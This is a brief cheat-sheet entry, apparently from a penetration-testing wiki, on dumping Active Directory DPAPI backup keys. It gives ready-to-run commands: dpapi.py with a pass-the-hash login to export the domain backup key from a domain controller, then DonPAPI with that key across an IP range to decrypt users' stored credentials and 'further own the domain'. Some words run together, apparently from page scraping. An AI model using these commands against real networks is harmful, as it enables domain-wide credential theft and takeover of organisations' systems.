DPAPI Backup Keys dumping
Tools: dpapi.py , DonPAPI
dpapi.py backupkeys -hashes':HASH' -t Administrator@DC_IP --exportThen
DonPAPI -pvk DOMAIN_BACKUP_KEY.PVK -H':HASH' DOMAIN/USER@IP_RANGEWith this technique, we dump credentials to further own the domain
Last updated